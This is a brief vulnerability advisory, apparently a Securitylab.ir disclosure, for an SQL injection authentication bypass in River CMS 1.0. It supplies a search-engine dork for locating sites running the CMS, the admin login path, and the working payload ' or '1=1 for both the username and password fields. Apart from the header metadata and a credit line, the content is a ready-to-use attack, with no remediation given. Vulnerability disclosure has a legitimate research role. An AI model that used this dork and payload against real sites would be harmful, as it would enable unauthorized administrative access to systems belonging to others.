River CMS version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.
3f9fd122e2c9c13cf36e4141986c3d46#################################################################
# Securitylab.ir
#################################################################
# Application Info:
# Name: River CMS
# Version: 1.0
# Vendor: http://rivercms.ir
#################################################################
# Vulnerability Info:
# Type: Sql Injection
# Risk: Medium
# Dork: "Powered By River CMS"
#################################################################
Vulnerability:
http://site.ir/admin/
Username: ' or '1=1
Password: ' or '1=1
#################################################################
# Discoverd By: Pouya Daneshmand
# Website: http://securitylab.ir
# Contacts: admin[at]securitylab.ir & whh_iran[AT]yahoo.com
###################################################################
Comments
No comments yet, be the first!